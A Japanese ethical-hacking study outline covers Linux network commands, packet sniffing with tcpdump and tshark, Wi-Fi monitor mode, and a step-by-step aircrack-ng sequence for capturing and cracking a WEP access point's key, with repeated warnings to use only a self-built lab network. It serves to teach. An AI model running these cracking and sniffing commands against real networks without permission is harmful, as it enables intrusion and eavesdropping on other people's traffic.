ネットワークハッキング入門
https://gyazo.com/c27b5c16077615216cbb2919d65b40e1
実際にコマンドを打ちながら学んだほうが理解が進むと思われる
参考文献
エシカルハッキング(倫理的ハッキング)
プライバシーを大切にしましょう
実験用のネットワークを用意して、そこで実験しましょう
環境
Linux(Ubuntu 20.04)
ip a
表示の意味
lo0
ループバックアドレス
localhost
eth0
ethernet接続NIC
wlan0, wlan1
wireless lan接続NIC
inet
ローカルIPアドレス
自分のマシンのネットワーク接続状態を確認
route
ss
Wi-Fi機能があるマシンの場合
Wi-Fiデバイスを確認
sudo iw dev
sudo iw list
周辺のWi-Fi APを探索する
iwlist wlan0 scan
iwlist wlan1 scan
できるNIC/Wi-Fiデバイスが限られているやつ
sudo ip link set wlan1 promisc on
対応しているデバイスでないとエラーになる
SET failed on device wlan0 ; Operation not supported.
もとに戻す
sudo ip link set wlan1 promisc off
sudo iw wlan1 set monitor control
対応しているデバイスでないとエラーになる
command failed: Operation not supported (-95)
もとに戻す
sudo iw wlan1 set type managed
APに接続する
sudo ip link set wlan1 up
↑でエラーが出る場合は以降のこともできない
sudo apt install tcpdump
sudo tcpdump -i wlan1 -A -n not arp and not port 22
https://gyazo.com/8dccfc2427dbfc3d7e848fd186f5f4af
sudo tcpdump -i wlan1 -n not arp and not port 22 -w hoge.cap
sudo tcpdump -i wlan1 port 80 or port 443
sudo apt install tshark
sudo tshark -i wlan1 -Px
sudo tshark -i wlan1 -Y http
horstをつかってWi-Fi APの電波強度などを可視化する sudo apt install horst
sudo horst -i wlan1
https://gyazo.com/db76108ad9070649ada0761fc955e886
kismetをつかってWi-Fi APの電波強度などを可視化する sudo apt install kismet
ログファイルが大量に生成されるので、適当なディレクトリを作ってそこで作業する
mkdir kismet && cd kismet
sudo kismet -c wlan1
sudo apt install aircrack-ng
適当なディレクトリを作ってそこで作業する
mkdir air && cd air
ネットワーク関係のサービスを止める(SSHが切れるので注意;これをスキップしても動く)
sudo airmon-ng check kill
周囲のWi-Fi APのデータを収集する
sudo airodump-ng wlan1 -w airscan
https://gyazo.com/3370396f79904223afcaf84835fc0600
airscan-*[0-9].csvというファイルにデータが集まる
WEPを使っている脆弱そうなWi-Fi APを周辺から探す 見知らぬ他人のWi-Fi APのパスワードを許可なく解析するのは犯罪行為です
というわけでもちろん攻撃実験用のWEP Wi-Fi APを自分で用意しましょう
cat airscan-*[0-9].csv | grep WEP
とやれば自分の用意した攻撃実験用Wi-Fi APが見つかるはず
攻撃実験用Wi-Fi APのパケットを収集する
sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w aircap wlan1
結構待つ必要がある
集めたパケットからWi-Fi APのWEPパスワードを解析する
aircrack-ng aircap-*.cap
ダメだったらもっとパケットを収集してみましょう
あとで書く
arpスプーフィング
ポートスキャン
nmap
wireshark
HTTPS通信の傍受
Metasploit
MITM proxy
覚えておくといいコマンド
ip
ip a
ip a show wlan0
iw
iw dev
iwlist
iwlist wlan0 scan
tcptraceroute
mtr
ss
dig
iptables
arp
telnet
netem
tc
curl inet-ip.info
/etc/hosts